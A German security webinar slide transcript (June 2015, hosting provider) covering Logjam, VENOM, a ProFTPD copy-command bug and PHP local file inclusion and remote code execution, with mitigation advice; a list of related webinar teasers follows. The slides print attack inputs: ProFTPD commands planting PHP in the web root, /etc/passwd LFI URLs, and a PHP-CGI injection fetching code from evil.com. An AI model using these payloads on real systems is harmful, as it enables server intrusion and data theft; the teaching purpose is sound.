Security-Webinar. Juni Dr. Christopher Kunz, filoo GmbH

Größe: px
Ab Seite anzeigen:

Download "Security-Webinar. Juni Dr. Christopher Kunz, filoo GmbH"

Transkript

1 Security-Webinar Juni 2015 Dr. Christopher Kunz, filoo GmbH

2 Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor von Ar7keln & Büchern _ Modera7on: Sibylle Blöchl _ Marke7ng Thomas- Krenn.AG _ Sammelt Fragen / Feedback

3 filoo GmbH _ Wir sind die Hos7ng- Tochter der Thomas- Krenn.AG _ Sicheres, hochperformantes Hos7ng in Frankfurt _ Mitarbeiter in Gütersloh und Freyung _ Primärer Rechenzentrumsstandort Frankfurt _ Tier3, ISO _ Fläche in zwei Brandabschni[en _ Managed Services _ Security Services _ Systemadministra7on _ Planung & Deployment

4 Agenda _ Security im April / Mai _ Logjam _ Venom _ ProFTPD- Server _ Web- Security Teil 2: LFI/RCE _ Was ist LFI, was RCE? _ Warum ist es gefährlich? _ (Wie) Kann ich es heilen?

5 Logjam-TLS-Problem _ Problem im Schlüsselaustausch (Diffie- Hellman) _ Ähnlich wie FREAK- Lücke _ Angreifer kann schlechte Verschlüsselung erzwingen _ Zu beheben über Konfigura7onsänderungen _ Mehr Info + Server- Test: _ h[ps://weakdh.org/sysadmin.html

6 VENOM _ Lücke in bekannten Virtualisierungsplaeormen _ KVM _ Xen _ Problem im Floppy- Disk- Treiber _ Ausbruch aus virtueller Maschine möglich _ Behoben in der filoo Cloud _ Natürlich auch in aktuellen Versionen von Xen/KVM

7 ProFTPD Security Bug _ Kopierbefehl in ProFTPD: CPFR, CPTO _ Kann von nicht authen7fizierten Nutzern ausgeführt werden _ Gefahr 1: Sensi7ve Daten kopieren/überschreiben _ CPFR /etc/passwd _ CPTO /tmp/passwd.woanders _ Gefahr 2: Code ausführen! _ site cpto <?php phpinfo();?> _ site cpfr /proc/self/fd/3 _ site cpto /var/www/test.php

8 ProFTPD Security Bug test.php: :01:13,159 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): error rewinding scoreboard: Invalid argument :01:13,159 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): FTP session opened :01:27,943 slon-p5q proftpd[16255] slon-p5q (slon-p5q.lan[ ]): error opening destination file '/<?php phpinfo();?>' for copying: Permission denied

9 ProFTPD Security Bug _ Angreifer rul nun auf: h[p:// /test.php _ Resultat: Ausführung beliebigen PHP- Codes _ Angreioar: Version _ Patches aller Distribu7onen exis7eren _ Alterna7ve: mod_copy.c deak7vieren (nicht laden)

10 Web Security 1: LFI/RCE _ Local File Inclusion _ Lokale Inklusion von Dateien _ Remote Code Execu7on _ Ausführung von Code aus der Ferne _ Angriff gegen Web- Server _ Funk7onsweise: Skriptcode (meist PHP) auf Server einschleusen und ausführen

11 Local File Inclusion _ Nachladen von Dateien, die nicht nachgeladen werden sollen _ Innerhalb von CGI- Skripten, PHP etc. _ Lokal hier: Auf dem Server _ Grund: Programmierfehler _ Z.B. beim Bau der Seitenlogik im Skript _ Oder beim Laden von Konfigura7on/Sprachdateien _ Auswirkungen _ Informa7ons- Lecks (Configfiles, Kundendaten, /etc/passwd) _ Code- Ausführung _ Denial of Service

12 Codebeispiel für LFI <?php include($_get[seitenname]..php );?> _ Variable für Seitenname kommt aus der URL _ h[p:// /x.php?seitenname=index _ h[p:// /x.php?seitenname=x _ Denial of Service (Endlosschleife) _ h[p:// /x.php?seitenname=/etc/passwd%00 _ Informa7onsleck _ Eigenen Code ausführen: Nicht trivial

13 Remote Code Execution _ ProFTPD- Bug ist ein RCE- Bug über Bande _ Eigentlich LFI _ Andere Möglichkeiten: SSH- Logfile, Mail- Log _ Königsdisziplin: Direkte Ausführung von Schadcode ohne lokale Dateien _ Ol eine Kombina7on von Lücken _ Häufig: Problem in einem Skript _ Fehlerhale Auswertungslogik

14 Angriffe mit RCE

15 Weevely _ Framework zum Ausnutzen von RCE- Bugs _ Interak7ve Shell auf PHP- Basis _ Benö7gt eine LFI/RCE Lücke _ Polymorphe Shell mit vielen Funk7onen

16 Weevely Screenshot/ Demo

17 Von LFI zu RCE _ LFI per proc- Dateisystem (PHP- CGI): h[p:// sicherheit.de/index.php?page=/proc/self/ environ (User- Agent auf <?php phpinfo()?> setzen _ h[p:// sicherheit.de/index.php? page=data:;base64,pd9wahagcghwaw5mbygpid8 Geht auch nur mit allow_url_include = On _ PHP- CGI Bug (CVE , behoben in 5.4.3/5.3.13) h[p:// sicherheit.de/?- d%20allow_url_include %3DOn+- d%20auto_prepend_file%3dh[p://evil.com/ code.txt%20- n

18 LFI / RCE verhindern _ Sauber programmieren _ Inklusion von Dateien aus User- Input vermeiden _ Administra7on prüfen _ Uploads von Dateien durch Nutzer beschränken _ Stets aktuelles PHP, Webserver, etc. nutzen

19 Vielen Dank _ Ich freue mich auf Ihre Themenvorschläge und Fragen! _ Kontaktdaten: _ E- Mail: chris@filoo.de _ Telefon: 05241/ _ Besuchen Sie filoo! _ h[ps:// _ h[p://twi[er.com/filoogmbh

Security-Webinar. Februar 2015. Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Februar 2015. Dr. Christopher Kunz, filoo GmbH Security-Webinar Februar 2015 Dr. Christopher Kunz, filoo GmbH Ihr Referent _ Dr. Christopher Kunz _ CEO Hos4ng filoo GmbH / TK AG _ Promo4on IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC

Mehr

Security-Webinar. April Dr. Christopher Kunz, filoo GmbH

Security-Webinar. April Dr. Christopher Kunz, filoo GmbH Security-Webinar April 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. Jahresrückblick. Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Jahresrückblick. Dr. Christopher Kunz, filoo GmbH Security-Webinar Jahresrückblick Dr. Christopher Kunz, filoo GmbH Ihr Referent _ Dr. Christopher Kunz _ CEO Hos4ng filoo GmbH / TK AG _ Promo4on IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC

Mehr

Security-Webinar. Juli Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Juli Dr. Christopher Kunz, filoo GmbH Security-Webinar Juli 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ 1 / 2 Geschäftsführer filoo GmbH _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. September Dr. Christopher Kunz, filoo GmbH

Security-Webinar. September Dr. Christopher Kunz, filoo GmbH Security-Webinar September 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _

Mehr

Security-Webinar. März 2015. Dr. Christopher Kunz, filoo GmbH

Security-Webinar. März 2015. Dr. Christopher Kunz, filoo GmbH Security-Webinar März 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hos7ng filoo GmbH / TK AG _ Promo7on IT Security _ Vorträge auf Konferenzen _ Autor von

Mehr

Security-Webinar. November Dr. Christopher Kunz, filoo GmbH

Security-Webinar. November Dr. Christopher Kunz, filoo GmbH Security-Webinar November 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team Referent: Dr. Christopher Kunz 1 / 2 Geschäftsführer filoo GmbH Promotion IT Security Vorträge auf Konferenzen Autor von

Mehr

Zweifaktor-Authentifizierung

Zweifaktor-Authentifizierung Zweifaktor-Authentifizierung Juni 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen

Mehr

Security-Webinar. Dezember 2015. Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Dezember 2015. Dr. Christopher Kunz, filoo GmbH Security-Webinar Dezember 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. März Dr. Christopher Kunz, filoo GmbH

Security-Webinar. März Dr. Christopher Kunz, filoo GmbH Security-Webinar März 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. Mai Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Mai Dr. Christopher Kunz, filoo GmbH Security-Webinar Mai 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. August Dr. Christopher Kunz, filoo GmbH

Security-Webinar. August Dr. Christopher Kunz, filoo GmbH Security-Webinar August 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. Januar Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Januar Dr. Christopher Kunz, filoo GmbH Security-Webinar Januar 2016 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

Security-Webinar. November 2015. Dr. Christopher Kunz, filoo GmbH

Security-Webinar. November 2015. Dr. Christopher Kunz, filoo GmbH Security-Webinar November 2015 Dr. Christopher Kunz, filoo GmbH Ihr Webinar-Team _ Referent: Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ Vorträge auf Konferenzen _ Autor

Mehr

SSL-Zertifikate. Dr. Christopher Kunz

SSL-Zertifikate. Dr. Christopher Kunz SSL-Zertifikate Dr. Christopher Kunz Ihr Referent _ Dr. Christopher Kunz _ CEO Hosting filoo GmbH / TK AG _ Promotion IT Security _ X.509 / SSL _ Vorträge auf Konferenzen _ OSDC 2012: SSL-Hacks _ OSDC

Mehr

Georedundante RZ. Doppelt gemoppelt hält besser. Dr. Christopher Kunz, filoo GmbH

Georedundante RZ. Doppelt gemoppelt hält besser. Dr. Christopher Kunz, filoo GmbH Georedundante RZ Doppelt gemoppelt hält besser Dr. Christopher Kunz, filoo GmbH Ihr Referent _Dr. Christopher Kunz _CEO Hosting filoo GmbH / TK AG _Promotion IT Security _ X.509 / SSL _Vorträge auf Konferenzen

Mehr

Security-Webinar. Dezember Dr. Christopher Kunz, filoo GmbH

Security-Webinar. Dezember Dr. Christopher Kunz, filoo GmbH Security-Webinar Dezember 2016 Dr. Christopher Kunz, filoo GmbH Über mich Dr. Christopher Kunz Geschäftsführer filoo GmbH Promotion IT Security Vorträge auf Konferenzen Autor von Artikeln & Büchern filoo

Mehr

Sicheres Hosting in der Cloud. Dr. Christopher Kunz filoo GmbH

Sicheres Hosting in der Cloud. Dr. Christopher Kunz filoo GmbH Sicheres Hosting in der Cloud Dr. Christopher Kunz filoo GmbH Organisatorisches _ Dieser Webcast wird aufgezeichnet _ Link zur Aufzeichnung per Mail _ Fragen bi;e im Chat stellen _ Ich antworte, wie es

Mehr

Dem Hack keine Chance LAMP im Shared Hosting sicher betreiben

Dem Hack keine Chance LAMP im Shared Hosting sicher betreiben Dem Hack keine Chance LAMP im Shared Hosting sicher betreiben Heinlein Professional Linux Support GmbH Holger Uhlig h.uhlig@heinlein support.de Agenda: Prioritäten des Shared Hosting Selbstschutz Wo sind

Mehr

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Heinlein Support GmbH Peer Heinlein Selbstschutz Wo sind meine Risiken? Haben wir Geheimnisse?.htaccess und.htpasswd

Mehr

UCS 2.4 Sicherheits-Update 3

UCS 2.4 Sicherheits-Update 3 UCS 2.4 Sicherheits-Update 3 Thema: Änderungen im Sicherheitsupdate 3 für UCS 2.4 Datum: 3. Mai 2011 Seitenzahl: 7 Versionsnummer: 8598 Autoren: Univention GmbH feedback@univention.de Univention GmbH Mary-Somerville-Straße

Mehr

When your browser turns against you Stealing local files

When your browser turns against you Stealing local files Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester

Mehr

suhosin PHP-Patch und PHP-Security Extension Peter Prochaska - http://www.peter-prochaska.de

suhosin PHP-Patch und PHP-Security Extension Peter Prochaska - http://www.peter-prochaska.de suhosin PHP-Patch und PHP-Security Extension Peter Prochaska Freiberuflicher Security-Consultant, PHP- Entwickler, Trainer und Autor. PHP-Entwickler seit 1998 Buchautor: PHP-Sicherheit, dpunkt.verlag Mitentwickler

Mehr

PHP-Sicherheit. Christopher Kunz kunz@rvs.uni-hannover.de. Regionales Rechenzentrum für Niedersachsen

PHP-Sicherheit. Christopher Kunz kunz@rvs.uni-hannover.de. Regionales Rechenzentrum für Niedersachsen PHP-Sicherheit Christopher Kunz kunz@rvs.uni-hannover.de Vorstellung PHP-Erfahrung seit 1999 Studium (M. Sc. Informatik) in Hannover Mitglied im Hardened-PHP Project URLs http://www.christopher-kunz.de/

Mehr

Websites mit Dreamweaver MX und SSH ins Internet bringen

Websites mit Dreamweaver MX und SSH ins Internet bringen Websites mit Dreamweaver MX und SSH ins Internet bringen 1. Vorüberlegungen Dreamweaver stellt Funktionen bereit, um Websites im Internet zu veröffentlichen. Um diese Funktionen auf Servern des Rechenzentrums

Mehr

Datenbanken und Netzanbindung

Datenbanken und Netzanbindung Datenbanken und Netzanbindung Zusammenfassung von Michael Reiher zum Vortrag Webserver und Sicherheit. Meine Ausarbeitung befasst sicht sich mit Möglichkeiten eines Angriffs auf einen Webserver. Seite

Mehr

Websecurity. Hochschule Darmstadt, Fachbereich Informatik, Sommersemester Christopher Dörge, Thomas Sauer, David Müller

Websecurity. Hochschule Darmstadt, Fachbereich Informatik, Sommersemester Christopher Dörge, Thomas Sauer, David Müller Websecurity Hochschule Darmstadt, Fachbereich Informatik, Sommersemester 2017 Christopher Dörge, Thomas Sauer, David Müller Vorab ein Disclaimer Websecurity ist ein Dauerthema. Ständig werden neue Angriffspatterns

Mehr

Teil 1: CSWS Update, Konfiguration (Information von Hans Bachner,, HP Austria) CSWS im DECUSnet

Teil 1: CSWS Update, Konfiguration (Information von Hans Bachner,, HP Austria) CSWS im DECUSnet Webserver unter OpenVMS Teil 1: CSWS Update, Konfiguration (Information von Hans Bachner,, HP Austria) Teil 2: Praktischer Einsatz des CSWS im DECUSnet DECUS München IT-Symposium 2004 Hotel Maritim,, Bonn,

Mehr

Web Hacking - Angriffe und Abwehr

Web Hacking - Angriffe und Abwehr Web Hacking - Angriffe und Abwehr UNIX-Stammtisch 31. Januar 2012 Frank Richter Holger Trapp Technische Universität Chemnitz Universitätsrechenzentrum Motivation (1): Für uns Lehrveranstaltung: Techniken

Mehr

Grundlagen Internet-Technologien INF3171

Grundlagen Internet-Technologien INF3171 Fachbereich Informatik Informationsdienste Grundlagen Internet-Technologien INF3171 Cookies & Sessions Version 1.0 20.06.2016 aktuelles 2 Erweiterungen wir betrachten zwei Erweiterungen: Personalisierung

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

Typo3 - Schutz und Sicherheit - 07.11.07

Typo3 - Schutz und Sicherheit - 07.11.07 Typo3 - Schutz und Sicherheit - 07.11.07 1 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Magento Application Security. Anna Völkl / @rescueann

Magento Application Security. Anna Völkl / @rescueann Magento Application Security Anna Völkl / @rescueann Anna Völkl @rescueann Magento Certified Developer PHP seit 2004 Magento seit 2011 IT & Telekommunikation (BSc), IT-Security (MSc) LimeSoda (Wien, AT)

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

OPENNEBULA ALS OPEN SOURCE CLOUD VIRTUALISIERUNGSLÖSUNG

OPENNEBULA ALS OPEN SOURCE CLOUD VIRTUALISIERUNGSLÖSUNG OPENNEBULA ALS OPEN SOURCE CLOUD VIRTUALISIERUNGSLÖSUNG WEBINAR 05.03.2015 CHRISTIAN STEIN NETWAYS GMBH FLORIAN HETTENBACH THOMAS-KRENN AG REFERENTENVORSTELLUNG Christian Stein Account Manager Bei NETWAYS

Mehr

Datenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke

Datenschutztag. Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke Datenschutztag Eine Präsentation von Mateusz Gwara, Philipp Leder, Paul Panser und Patrick Wilke 1. Website Security Gliederung 2. Viren, Trojaner & Antivirensoftware 3. Phishing & Gefahren des World Wide

Mehr

Applica'on Performance Monitoring in der Oracle Cloud

Applica'on Performance Monitoring in der Oracle Cloud Applica'on Performance Monitoring in der Oracle Cloud Marcus Schröder Master Principal Sales Consultant ORACLE Deutschland B.V. & Co. KG 16-Nov-2015 Copyright 2016, Oracle and/or its affiliates. All rights

Mehr

WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS. Trügerische Sicherheit im Internet

WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS. Trügerische Sicherheit im Internet WEBINAR: HTTPS, ZERTIFIKATE, GRÜNE URLS Trügerische Sicherheit im Internet HERZLICH WILLKOMMEN Die Moderatoren Andreas Krenz Client Relationship Manager Fragen über Chat Frank Pöhler Senior Consultant

Mehr

Gehackte Webapplikationen und Malware

Gehackte Webapplikationen und Malware 2014-04-11 Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000

Mehr

Sicheres Hosting in der Cloud. Jens Rehpöhler filoo GmbH

Sicheres Hosting in der Cloud. Jens Rehpöhler filoo GmbH Sicheres Hosting in der Cloud Jens Rehpöhler filoo GmbH Organisatorisches _Dieser Webcast wird aufgezeichnet _Link zur Aufzeichnung per E-Mail _Organisatorin im Hintergrund nimmt Fragen entgegen _Umfrage

Mehr

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist?

Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? Pallas Security Colloquium Web Application Testing: Wie erkenne ich, ob meine Website angreifbar ist? 18.10.2011 Referent: Tim Kretschmann Senior System Engineer, CISO Pallas GmbH Hermülheimer Straße 8a

Mehr

Patch Management mit

Patch Management mit Patch Management mit Installation von Hotfixes & Patches Inhaltsverzeichnis dieses Dokuments Einleitung...3 Wie man einen Patch installiert...4 Patch Installation unter UliCMS 7.x.x bis 8.x.x...4 Patch

Mehr

Inhaltsverzeichnis. Inhaltsverzeichnis. Vorwort 9

Inhaltsverzeichnis. Inhaltsverzeichnis. Vorwort 9 Inhaltsverzeichnis Vorwort 9 1 Quickstart 11 1.1 Der Begriff XAMPP 12 1.2 Installation von XAMPP für Windows 14 1.3 Installation von XAMPP für Linux 17 1.4 Installation von XAMPP für Mac OS X 19 1.5 XAMPP

Mehr

PHP-5-Zertifizierung. Block 12 Security.

PHP-5-Zertifizierung. Block 12 Security. PHP-5-Zertifizierung Block 12 Security Allgemeine Regeln Alle Eingaben (von außen) sind (potenziell) böse Eingaben filtern/validieren Ausgaben escapen Trauen Sie nichts von außen! GET-/POST-Daten Cookies

Mehr

Einrichtung Secure-FTP

Einrichtung Secure-FTP Einrichtung Secure-FTP ONEGroup Hochriesstrasse 16 83101 Rohrdorf Steffen Prochnow Hochriesstrasse 16 83101 Rohrdorf Tel.: (08032) 989 492 Fax.: (01212) 568 596 498 agb@onegroup.de 1. Vorwort... 2 2. Einrichtung

Mehr

Erste Schritte. Eine Webseite erstellen. Erste Schritte Version 1

Erste Schritte. Eine Webseite erstellen. Erste Schritte Version 1 Erste Schritte In dieser Anleitung zeigen wir Ihnen, welche Schritte notwendig sind um eine Webseite bei uns in Betrieb zu nehmen. Exemplarisch wird dies mit Windows XP und den unter Windows verfügbaren

Mehr

Upgrade auf TYPO3 6.2

Upgrade auf TYPO3 6.2 Upgrade auf TYPO3 6.2 Jochen Weiland Wolfgang Wagner TYPO3camp Berlin 2014! Fakten Kunden lieben LTS Versionen Die meisten Projekte laufen mit 4.5 Fakten 3.5 Jahre seit dem Release 4.5 34 Release seitdem

Mehr

Christopher Kunz Peter Prochaska. PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. dpunkt.verlag

Christopher Kunz Peter Prochaska. PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. dpunkt.verlag Christopher Kunz Peter Prochaska PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren dpunkt.verlag 1 Einleitung 1 1.1 Über dieses Buch 1 1.2 Was ist Sicherheit? 3 1.3 Wichtige Begriffe 4 1.4 Sicherheitskonzepte

Mehr

Workbooster File Exchanger Command Line Tool

Workbooster File Exchanger Command Line Tool Thema Technische Benutzerdokumentation - WBFileExchanger Workbooster File Exchanger Command Line Tool Letzte Anpassung 18. Januar 2014 Status / Version Finale Version - V 1.1 Summary Erstellung Diese technische

Mehr

Linux-Camp: Linux als Server am Beispiel LAMP

Linux-Camp: Linux als Server am Beispiel LAMP Linux-Camp: Linux als Server am Beispiel LAMP Linux, Apache, MySQL, PHP mit Ubuntu Version 8.04 Inhalt LAMP-Komponenten LAMP-Komponenten installieren, konfigurieren und prüfen Apache Webserver PHP5 MySQL

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Powershell DSC Oliver Ryf

Powershell DSC Oliver Ryf 1 Powershell DSC Oliver Ryf Partner: 2 Agenda Begrüssung Vorstellung Referent PowerShell Desired State Configuration F&A Weiterführende Kurse 3 Vorstellung Referent Seit 1991 IT-Trainer 1995 MCSE und MCT

Mehr

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27

PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 PHP-Security Aleksander Paravac watz@lug-bamberg.de http://www.lug-bamberg.de Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27 Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver

Mehr

Ganz sicher sicher surfen. it-sa 2013 Nürnberg

Ganz sicher sicher surfen. it-sa 2013 Nürnberg Ganz sicher sicher surfen it-sa 2013 Nürnberg + Soforthilfe gegen kritische Reader-Lücken heise.de, 14.02.2013 Wer mit den aktuellen Versionen des Adobe Reader ein PDF-Dokument öffnet, läuft Gefahr, sich

Mehr

Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab?

Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? APEX aber sicher Wie sichert man APEX-Anwendungen gegen schädliche Manipulationen und unerwünschte Zugriffe ab? Carola Berzl BASEL BERN BRUGG GENF LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR.

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Über mich. Dem Hacker keine Chance Marc Nilius WordPress-Meetup Bonn

Über mich. Dem Hacker keine Chance Marc Nilius WordPress-Meetup Bonn Über mich Diplom-Informatiker und selbständiger Web-Entwickler WordPress-Wartung und WordPress-Sicherheit @marcnilius oder @wpsicherheit https://www.wp-wartung24.de Co-Organizer diverser Meetups und WordCamps

Mehr

Neues aus dem DFN-CERT. 47. DFN-Betriebstagung - Forum Sicherheit 16. Oktober 2007 Andreas Bunten, DFN-CERT

Neues aus dem DFN-CERT. 47. DFN-Betriebstagung - Forum Sicherheit 16. Oktober 2007 Andreas Bunten, DFN-CERT Neues aus dem DFN-CERT 47. DFN-Betriebstagung - Forum Sicherheit 16. Oktober 2007 Andreas Bunten, DFN-CERT Veranstaltungen Tutorium DFN-PKI in der Praxis 22./23. Nov. 2007 in München (Ismaning) Telekom

Mehr

Copyright 2012, Oracle and/or its affiliates. All rights reserved.

Copyright 2012, Oracle and/or its affiliates. All rights reserved. Datenbankinstallation und Patching mit Cloud Control Ralf Durben Senior Principal Sales Consultant Copyright 2012, Oracle and/or its affiliates. All rights reserved. Agenda Grundlagen des Provisionings

Mehr

NEUIGKEITEN SAS 9.4 ARCHITEKTUR PHILLIP MANSCHEK

NEUIGKEITEN SAS 9.4 ARCHITEKTUR PHILLIP MANSCHEK NEUIGKEITEN SAS 9.4 ARCHITEKTUR PHILLIP MANSCHEK HÄUFIGE FRAGEN Ist SAS 9.4 ein Update/Upgrade von/für SAS 9.3? Nein. Installation in ein separates SASHOME-Verzeichnis. Lassen sich SAS 9.3 und SAS 9.4

Mehr

Troubleshooting PHP Issues

Troubleshooting PHP Issues Troubleshooting PHP Issues Jan Burkl System Engineer jan@zend.com Code Qualität und der Einfluss auf Entwicklungszeit und -kosten Quelle: Boehm und Papaccio Studie Fehlerhafter Code verbraucht typischerweise

Mehr

Roland Tilgner. Solution Architects & Team Coaching DEVELOPMENT. ORACLE TEXT AUS PL/SQL-SICHT Features und Möglichkeiten

Roland Tilgner. Solution Architects & Team Coaching DEVELOPMENT. ORACLE TEXT AUS PL/SQL-SICHT Features und Möglichkeiten Roland Tilgner Solution Architects & Team Coaching DEVELOPMENT ORACLE TEXT AUS PL/SQL-SICHT Features und Möglichkeiten ZURPERSON Roland Tilgner ZURFIRMA Roland Tilgner Solution Architects & Team Coaching

Mehr

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko?

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko? Cnlab / CSI 2011 Demo Smart-Phone: Ein tragbares Risiko? Agenda Demo 45 Schutz der Smart-Phones: - Angriffsszenarien - «Jailbreak» - Was nützt die PIN? - Demo: Zugriff auf Passwörter iphone Bekannte Schwachstellen

Mehr

Powershell DSC Desired State Configuration

Powershell DSC Desired State Configuration Ab der Powershell Version 4 wird DSC unterstützt. Ich nutze Windows 10 und habe es standardmäßig on Board. Vorbereitung: Download der individuell benötigten Module aus der Powershell Gallery https://www.powershellgallery.com/items

Mehr

Perl-Praxis. CGI-Skripte. Madis Rumming, Jan Krüger.

Perl-Praxis. CGI-Skripte. Madis Rumming, Jan Krüger. Perl-Praxis CGI-Skripte Madis Rumming, Jan Krüger {mrumming,jkrueger}@cebitec.uni-bielefeld.de Übersicht WWW, Web-Server CGI-Skripte Parameterübergabe Web-Formulare CGI.pm Perl-Praxis CGI-Skripte 2/16

Mehr

Anwendungen. Tom Vogt. <tom@lemuria.org>

Anwendungen. Tom Vogt. <tom@lemuria.org> Security Enhanced Linux Einführung Architektur Anwendungen Tom Vogt Der Autor beschäftigt sich seit ca. 10 Jahren mit Linux. hat an verschiedensten Free Software Projekten mitgearbeitet,

Mehr

Zusammenfassung Web-Security-Check ZIELSYSTEM

Zusammenfassung Web-Security-Check ZIELSYSTEM Zusammenfassung Web-Security-Check ZIELSYSTEM für KUNDE (nachfolgend Auftraggeber genannt) von secudor GmbH Werner-von-Siemensstraße 6 Gebäude 9 86159 Augsburg (nachfolgend Auftragnehmer genannt) Inhalt

Mehr

OpenNebula. public and private cloud management.! Martin Alfke <martin.alfke@buero20.org>

OpenNebula. public and private cloud management.! Martin Alfke <martin.alfke@buero20.org> public and private cloud management! Martin Alfke - Martin Alfke - Freelancer - Berlin/Germany Automation and Cfg Mgmt epost Development GmbH Migration von HW auf VM Umzug Bonn

Mehr

IML Deployment Axel Hahn 31.10.2013 zuletzt geändert: 04.04.2014

